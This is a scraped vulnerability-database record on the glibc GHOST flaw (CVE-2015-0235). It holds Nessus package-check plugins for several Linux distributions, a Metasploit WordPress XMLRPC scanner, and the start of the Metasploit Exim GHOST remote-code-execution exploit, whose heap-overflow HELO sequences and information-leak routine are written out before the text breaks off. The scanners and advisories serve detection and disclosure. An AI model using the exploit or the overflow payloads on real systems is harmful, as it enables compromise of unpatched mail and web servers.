pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) 
flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.13\", pkgarch:\"x86_64\", pkgnum:\"8_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"i486\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.15\", pkgarch:\"x86_64\", pkgnum:\"9_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", 
pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"10_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif 
(slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.20\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:24", "bulletinFamily": "scanner", "description": "Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and gethostbyname2() function calls in the glibc library. This vulnerability allows a remote attacker that is able to make an application call to either of these functions to execute arbitrary code with the permissions of the user running the application. The gethostbyname() function calls are used for DNS resolving, which is a very common event. 
To exploit this vulnerability, an attacker must trigger a buffer overflow by supplying an invalid hostname argument to an application that performs a DNS resolution.", "modified": "2018-11-21T00:00:00", "id": "FREEBSD_PKG_0765DE84A6C111E4A0C1C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81062", "published": "2015-01-29T00:00:00", "title": "FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81062);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/21 10:46:31\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"FreeBSD : glibc -- gethostbyname buffer overflow (0765de84-a6c1-11e4-a0c1-c485083ca99c) (GHOST)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Robert Kratky reports :\n\nGHOST is a 'buffer overflow' bug affecting the gethostbyname() and\ngethostbyname2() function calls in the glibc library. This\nvulnerability allows a remote attacker that is able to make an\napplication call to either of these functions to execute arbitrary\ncode with the permissions of the user running the application. The\ngethostbyname() function calls are used for DNS resolving, which is a\nvery common event. 
To exploit this vulnerability, an attacker must\ntrigger a buffer overflow by supplying an invalid hostname argument to\nan application that performs a DNS resolution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1332213\"\n );\n # http://www.openwall.com/lists/oss-security/2015/01/27/9\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2015/01/27/9\"\n );\n # https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd7b81d9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-devtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-c6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux_base-f10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.6_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-f10>=0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-devtools<6.6_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-devtools>=0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:24", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81044", "published": "2015-01-28T00:00:00", "title": "Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# Oracle Linux Security Advisory ELSA-2015-0090 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81044);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The 
remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004811.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-07T23:52:34", "bulletinFamily": "exploit", "description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via a call to the WordPress XMLRPC interface. If the target is vulnerable, the system will segfault and return a server error. 
On patched systems, a normal XMLRPC error is returned.", "modified": "2017-07-24T13:26:21", "published": "2015-01-30T14:29:51", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "href": "", "type": "metasploit", "title": "WordPress XMLRPC GHOST Vulnerability Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress XMLRPC GHOST Vulnerability Scanner',\n 'Description' => %q{\n This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.\n },\n 'Author' =>\n [\n 'Robert Rowley',\n 'Christophe De La Fuente' ,\n 'Chaim Sanders' ,\n 'Felipe Costa' ,\n 'Jonathan Claudius' ,\n 'Karl Sigler' ,\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0235' ],\n [ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],\n [ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']\n ]\n ))\n\n register_options(\n [\n OptInt.new('LENGTH', [false, 'Payload length', 2500]),\n ])\n end\n\n def length\n datastore['LENGTH']\n end\n\n def run_host(ip)\n unless wordpress_and_online?\n print_error(\"Looks like this site is no WordPress blog\")\n return\n end\n\n unless wordpress_xmlrpc_enabled?\n print_error(\"XMLRPC interface is not enabled\")\n return\n end\n\n ghost = \"0\" * length\n payload = \"http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php\"\n xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, payload)\n\n 
res = send_request_cgi(\n 'uri' => wordpress_url_xmlrpc,\n 'method' => 'POST',\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => xml\n )\n\n if res.nil? || res.code == 500\n print_good(\"vulnerable to GHOST\")\n report_vuln(\n :host => ip,\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :name => self.name,\n :info => \"Module #{self.fullname} found GHOST vulnerability\",\n :sname => datastore['SSL'] ? \"https\" : \"http\"\n )\n else\n print_status(\"target not vulnerable to GHOST\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb"}, {"lastseen": "2018-09-24T19:17:36", "bulletinFamily": "exploit", "description": "This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based buffer overflow in the GNU C Library's gethostbyname functions on x86 and x86_64 GNU/Linux systems that run the Exim mail server.", "modified": "2017-07-24T13:26:21", "published": "2015-03-18T23:51:16", "id": "MSF:EXPLOIT/LINUX/SMTP/EXIM_GETHOSTBYNAME_BOF", "href": "", "type": "metasploit", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\n 'Description' => %q{\n This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based\n buffer overflow in the GNU C Library's gethostbyname functions on x86\n and x86_64 GNU/Linux systems that run the Exim mail server.\n },\n 'Author' => [\n 'Unknown', # Discovered and published by Qualys, Inc.\n ],\n 'License' => BSD_LICENSE,\n 'References' => [\n 
['CVE', '2015-0235'],\n ['US-CERT-VU', '967332'],\n ['OSVDB', '117579'],\n ['BID', '72325'],\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt'],\n ['URL', 'https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability'],\n ['URL', 'http://r-7.co/1CAnMc0'] # MSF Wiki doc (this module's manual)\n ],\n 'DisclosureDate' => 'Jan 27 2015',\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X64], but ^\n 'Payload' => {\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\n 'DisableNops' => true,\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\n },\n 'Targets' => [['Automatic', {}]],\n 'DefaultTarget' => 0\n ))\n\n register_options([\n Opt::RPORT(25),\n OptAddress.new('SENDER_HOST_ADDRESS', [true,\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\n ])\n\n register_advanced_options([\n OptBool.new('FORCE_EXPLOIT', [false, 'Let the exploit run anyway without the check first', nil])\n ])\n end\n\n def check\n # for now, no information about the vulnerable state of the target\n check_code = Exploit::CheckCode::Unknown\n\n begin\n # not exploiting, just checking\n smtp_connect(false)\n\n # malloc()ate gethostbyname's buffer, and\n # make sure its next_chunk isn't the top chunk\n\n 9.times do\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\n smtp_recv(HELO_CODES)\n end\n\n # overflow (4 bytes) gethostbyname's buffer, and\n # overwrite its next_chunk's size field with 0x00303030\n\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\n # from now on, an exception means vulnerable\n check_code = Exploit::CheckCode::Vulnerable\n # raise an 
exception if no valid SMTP reply\n reply = smtp_recv(ANY_CODE)\n # can't determine vulnerable state if smtp_verify_helo() isn't called\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\n\n # realloc()ate gethostbyname's buffer, and\n # crash (old glibc) or abort (new glibc)\n # on the overwritten size field\n\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\n # raise an exception if no valid SMTP reply\n reply = smtp_recv(ANY_CODE)\n # can't determine vulnerable state if smtp_verify_helo() isn't called\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\n # a vulnerable target should've crashed by now\n check_code = Exploit::CheckCode::Safe\n\n rescue\n peer = \"#{rhost}:#{rport}\"\n vprint_status(\"Caught #{$!.class}: #{$!.message}\")\n\n ensure\n smtp_disconnect\n end\n\n return check_code\n end\n\n def exploit\n unless datastore['FORCE_EXPLOIT']\n print_status(\"Checking if target is vulnerable...\")\n fail_with(Failure::NotVulnerable, \"Vulnerability check failed\") if check != Exploit::CheckCode::Vulnerable\n print_good(\"Target is vulnerable.\")\n end\n information_leak\n code_execution\n end\n\n private\n\n HELO_CODES = '250|451|550'\n ANY_CODE = '[0-9]{3}'\n\n MIN_HEAP_SHIFT = 80\n MIN_HEAP_SIZE = 128 * 1024\n MAX_HEAP_SIZE = 1024 * 1024\n\n # Exim\n ALIGNMENT = 8\n STORE_BLOCK_SIZE = 8192\n STOREPOOL_MIN_SIZE = 256\n\n LOG_BUFFER_SIZE = 8192\n BIG_BUFFER_SIZE = 16384\n\n SMTP_CMD_BUFFER_SIZE = 16384\n IN_BUFFER_SIZE = 8192\n\n # GNU C Library\n PREV_INUSE = 0x1\n NS_MAXDNAME = 1025\n\n # Linux\n MMAP_MIN_ADDR = 65536\n\n def fail_with(fail_subject, message)\n message = \"#{message}. 
For more info: http://r-7.co/1CAnMc0\"\n super(fail_subject, message)\n end\n\n def information_leak\n print_status(\"Trying information leak...\")\n leaked_arch = nil\n leaked_addr = []\n\n # try different heap_shift values, in case Exim's heap address contains\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\n # we'll keep the longest one (the least likely to have been truncated)\n\n 16.times do\n done = catch(:another_heap_shift) do\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\n vprint_status(\"#{{ heap_shift: heap_shift }}\")\n\n # write the malloc_chunk header at increasing offsets (8-byte step),\n # until we overwrite the \"503 sender not yet given\" error message\n\n 128.step(256, 8) do |write_offset|\n error = try_information_leak(heap_shift, write_offset)\n vprint_status(\"#{{ write_offset: write_offset, error: error }}\")\n throw(:another_heap_shift) if not error\n next if error == \"503 sender 